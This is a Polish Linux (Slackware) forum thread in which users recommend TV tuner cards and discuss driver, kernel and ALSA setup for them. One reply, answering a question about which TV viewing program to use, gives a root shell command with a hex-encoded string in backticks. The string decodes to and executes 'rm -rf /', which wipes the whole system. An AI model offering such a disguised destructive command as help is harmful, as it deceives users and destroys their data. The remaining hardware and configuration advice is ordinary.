Jaka karta TV (tuner)

Gdy jakieś urządzenie nie chce w Slackware działać...

Moderatorzy: Moderatorzy, Administratorzy

log_out
Użytkownik
Posty: 254
Rejestracja: 2004-08-19, 22:54

Jaka karta TV (tuner)

Post autor: log_out »

Nosze się ostatnio z zamiarem kupna takiego urządzenia i nie chciał bym wpaść jak z win-kamerką internetową czy win-drukarką, które nie działają pod Linuxem. Polecacie coś dobrze działającego pod Linuxem z tunerów TV ? chodzi mi przede wszystkim o jakość obrazu, z tego co widziałem po forach to ludzie raczej nażekają niż zachwalają support tego sprzętu.

Mam na oku Leadtek WinFast TV 2000 XP Expert, ale widziałem że ludzie mieli z nim problemy (brak kolorów, dźwięk), czy jego support jest teraz poprawny ? :)
Awatar użytkownika
brx
Użytkownik
Posty: 723
Rejestracja: 2004-06-24, 14:37
Lokalizacja: Poznań/Lublin

Re: Jaka karta TV (tuner)

Post autor: brx »

...wszystko pod bt878 jest obsługiwane, a narzekania mogą być powodem braku odpowiednij konfiguracji...

..co do jakości najlepiej jest podłączyć kablówke. Oczywiste jest że nie osiągniesz idealnego obrazu na antenie pokojowej :?
Slackware Current - Kernel 2.6.18 - Xfce - - Aterm - Kadu
_______________________________________
Registered Linux User 363857 :D
log_out
Użytkownik
Posty: 254
Rejestracja: 2004-08-19, 22:54

Re: Jaka karta TV (tuner)

Post autor: log_out »

No ja mam kablówke, ktoś jeszcze kożysta z anten pokojowych ? :| nawet na wsiach mają teraz kablówki/satki ;)

hmm... kurcze, bt878 to oznacza dość stare modele kart :\ a jak z nowym ukłądem conexanta cx ??
traser
Użytkownik
Posty: 60
Rejestracja: 2005-07-09, 14:59

Re: Jaka karta TV (tuner)

Post autor: traser »

Pixelview TV PRO. Pod Linuxem nie ma z nia zadnych problemow. Daje bardzo ladny obraz ma radio.
Mozna ja kupic w wersji z dzwiekiem stereo. Mencoderem mozna nagrywac programy z tv i robic z
nich divx. Jest to bardzo latwe. Ostatnio potanialy karty TV SAT zastanow sie czy nie kupic takiej.
log_out
Użytkownik
Posty: 254
Rejestracja: 2004-08-19, 22:54

Re: Jaka karta TV (tuner)

Post autor: log_out »

Ok kupiłem tą kartę o której piałem (Ledtek 2000 XP Expert) i nie jest źle, w każdym razie działa a to już dużo jak na Linuxa (zero konfiguracji, wszystko ładuje się samoistnie), niestety obraz jest 3x gorszy niż na Windowsie, ale może z czasem poprawią sterowniki, no chyba że to wina xawtv... jaki program polecacie do oglądania TV ??
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Jaka karta TV (tuner)

Post autor: sayetan »

# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
log_out
Użytkownik
Posty: 254
Rejestracja: 2004-08-19, 22:54

Re: Jaka karta TV (tuner)

Post autor: log_out »

Spróbowałem Tvtime ale jakoś mi nie pasował, dziwne sterowanie nastawione raczej na pilota a nie na myszke, chyba jednak najlepszy jest kdetv, mulaste, kolorowe i kde-tainted no ale trudno, przynajmniej działa tak jak powinien ;) no i ten deinterlacing, 60% procesora (Athlon 2800+) ale obraz jak żyletka ;)
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Jaka karta TV (tuner)

Post autor: BeteNoire »

log_out pisze:No ja mam kablówke, ktoś jeszcze kożysta z anten pokojowych ? :| nawet na wsiach mają teraz kablówki/satki ;)
Akurat mam z tematem anten trochę wspólnego i... zdziwiłbyś się ilu ludzi przechodzi na tzw. anteny siatkowe, rezygnując z kablówek. Nie każdy ma ochotę płacić coraz to podnoszony abonament, kiedy do szczęścia potrzebne im 2-3 kanały (w locie do 6), które spokojne można osiągnąc na antence za 30-50 zł.
Wydatek jednorazowy, jeśli nie liczyć późniejszej konserwacji sprzętu, dokupywania akcesoriów etc...

Odświeżyłem ten wątek ponieważ zamierzam nabyć wreszcie tuner TV.
Widzę, że Pixelview PRO jest chwalony.

Jakich jeszcze tunerków używacie i jakie macie z nimi doświadczenia?
Uwagi, wskazówki, opinie - mile widziane.
Awatar użytkownika
tad
Użytkownik
Posty: 349
Rejestracja: 2005-08-02, 11:07
Lokalizacja: Kraków

Re: Jaka karta TV (tuner)

Post autor: tad »

Miałem do dyspozycji 4 tunery:
* Pixelview Bt878
* Avermedia (1 dzień)
* Kworld MPEG
* Pixelview PRO (obecnie)

Potwierdzam, że Firmy Prolink Pixelview model 1 i 4 są najlepsze.
Biorę pod uwagę obraz i nagranie.

W Linuxie sprawdzałem dwa ostatnie.
Nagradzany za rzekomą jakość obrazu Kwold dawał mdły obraz, kłopoty z dzwiekiem stereo
i wiele innych problemów z konfigurowaniem.

Avermedia łatwo konfigurowalny o słabym tunerze. Wymagał silnej anteny. Mieszkam 6-8 km od stacji nadawczej TVP1 i TVP2, a odbiór z anteny pokojowej śnieżył, podczas gdy na zwykłym TV 15 cm kabelek daje obraz poprawny.

Prolink Pixelview Pro ma dość dobry ale nie do końca tuner (też wymaga silnego sygnału).
Ładny obraz, dobrze się nagrywa np. MJPEG i (MPEG4 w locie nie radzę).
Bezproblemowa konfiguracja.

Celem sprawdzenia tunerów TV polecam 10 MB dystrybucję GeeXboX.
http://www.geexbox.org/
Uruchamiana jako "Live CD" z możlwoścą zainstalowania na HDD.
Obsługuje niemal wszystkie modele kart TV, co do pixelview pro to akurat sam opracowałem plik konfiguracyjny i w takim wypadku proszę się do mnie zwrócić.
Oprócz tego ma wiele innych zalet.
* Tad *
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Jaka karta TV (tuner)

Post autor: BeteNoire »

A co powiecie o tym konkretnie modelu?
Awatar użytkownika
tad
Użytkownik
Posty: 349
Rejestracja: 2005-08-02, 11:07
Lokalizacja: Kraków

Re: Jaka karta TV (tuner)

Post autor: tad »

PV-TV304P+NICAM RC/FM
PV-TV304P+RC/FM
Procesor:
Conexant CX23883 !!! Obawiam się czy nie byłoby kłopotów z konfiguracją tego urządzenia pod ten chip. Linux może nie mieć jeszcze "suportu" dla niego.
Rozdzielczość: 720x480 @30kl/s (max. NTSC)
brak, przyjamniej nie podano rozdzielczości PAL 720x576 jaka obowiązuje do zapisu staandardu DVD to już źle!
Przetwornik video: 10-bit norma, Radio FM 87,5 - 108MHz stereo (pełno zakresowe)
Moduł tunera
TPI8PSB02D prod LG (LG: moim zdaniem b.dobrze strojący się tuner, nie zbyt wysokiej czułości). ale nie znam konkretnie tego modelu.
W tej dziedzinie polecem zdecydowanie TV na chipie BT878. Na przestrzeni lat nie zauważyłem większego postępu w dziedzinie tych urządzeń. Jedyne nowinki to NICAM stereo.
* Tad *
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Jaka karta TV (tuner)

Post autor: BeteNoire »

Co do obsługi przez kernel...
make menuconfig 2.6.13 pisze:Device Drivers ---> Multimedia devices ---> <M> Video For Linux -- Video For Linux ---> <M> Conexant 2388x (bt878 successor) support
:]
Awatar użytkownika
tad
Użytkownik
Posty: 349
Rejestracja: 2005-08-02, 11:07
Lokalizacja: Kraków

Re: Jaka karta TV (tuner)

Post autor: tad »

W takiej sytuacji polecałbym wziąć na próbę do sprawdzenia urządzenie do domu.
Prędzej czy później uda się skonfigurować. Wydaje mi się , że najlepiej programem
xawtv. Można też użyć do tego celu Knoppixa, ma własny konfigurator kart TV, który mnie dotychczas nie zawiódł.
* Tad *
BeteNoire
Użytkownik
Posty: 2666
Rejestracja: 2005-03-21, 01:39
Lokalizacja: z lasu

Re: Jaka karta TV (tuner)

Post autor: BeteNoire »

Knoppix wcale nie jest taki wspaniały o czym się ostatnio kilkakrotnie przekonałem :/ Zła konfiguracja, crashujące programy... Ale do rzeczy. Zakupiłem ten tunerek. Dziś mi go dostarczono więc od rana walczę z konfiguracją. Póki co mam obraz (niezbyt dobrej jakości i brak dźwięku). Może za parę godzin dojdę dlaczego nie ma dźwięku ;)
Awatar użytkownika
tad
Użytkownik
Posty: 349
Rejestracja: 2005-08-02, 11:07
Lokalizacja: Kraków

Re: Jaka karta TV (tuner)

Post autor: tad »

Byc może jest potrzebny (do dźwieku) moduł bt87x, lub (i) tvaudio.
Jeśli 1-go modułu brak to trzeba konfigurować ALSĘ --with-cards=bt87x
* Tad *
ODPOWIEDZ